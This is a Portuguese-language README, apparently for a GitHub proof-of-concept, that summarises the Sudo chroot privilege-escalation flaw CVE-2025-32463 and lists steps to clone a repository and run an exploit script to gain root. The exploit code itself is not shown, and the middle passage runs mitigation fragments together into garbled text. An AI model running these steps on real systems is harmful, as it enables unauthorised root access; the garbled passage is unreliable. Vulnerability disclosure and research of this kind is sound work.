
Exploit de escalada de privilégios local para CVE-2025-32463 visando a vulnerabilidade Sudo chroot. Fornece um script de prova de conceito para obter acesso root em sistemas Linux afetados.
Aqui está um resumo de CVE-2025-32463 sem links:
CVE-2025-32463 é uma vulnerabilidade de escalação de privilégio local nas versões 1.9.14 a 1.9.17 do Sudo. Ela abusa da opção --chroot (-R) manipulando a forma como o Sudo lida com nsswitch.conf. Isso permite que um atacante local engane o Sudo para carregar uma biblioteca compartilhada maliciosa, obtendo acesso root, mesmo que não esteja no arquivo sudoers.
sudo git clone https://github.com/B1ack4ash/Blackash-CVE-2025-32463.git
cd CVE-2025-32463
chmod +x CVE-2025-32463.sh
id
./CVE-2025-32463.sh
id
sudo -R /fake-dir some-command./fake-dir, eles colocam um falso etc/nsswitch.conf que força o Sudo a resolver usuários ou grupos através de um método personalizado.sudo --version--chroot a menos que necessárioMesmo que um usuário não tenha direitos sudo, ele pode potencialmente se tornar root ao abusar desse bug. É uma questão crítica que afeta muitos sistemas e deve ser corrigida imediatamente.
Este PoC é fornecido apenas para fins educacionais e de pesquisa. Executá-lo em qualquer sistema sem permissão é ilegal e antiético !!!